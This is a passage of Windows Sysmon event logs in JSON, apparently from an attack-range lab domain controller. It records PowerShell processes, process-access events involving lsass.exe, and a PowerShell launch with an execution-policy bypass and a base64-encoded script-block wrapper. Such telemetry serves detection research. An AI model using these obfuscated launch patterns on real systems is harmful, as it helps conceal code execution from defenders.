07:03:46.466","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.482\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nProcessId: 1360\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5hexf2km.3cx.ps1\r\nCreationUtcTime: 2020-08-01 07:03:46.482","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.482","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5hexf2km.3cx.ps1","CreationUtcTime":"2020-08-01 07:03:46.482","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":9259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.577\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nProcessId: 4692\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-13D2-5F25-0000-0020B61A1200}\r\nLogonId: 0x121AB6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nParentProcessId: 1360\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.577","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-13D2-5F25-0000-0020B61A1200}","LogonId":"0x121ab6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","ParentProcessId":"1360","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nSourceProcessId: 1360\r\nSourceThreadId: 3452\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 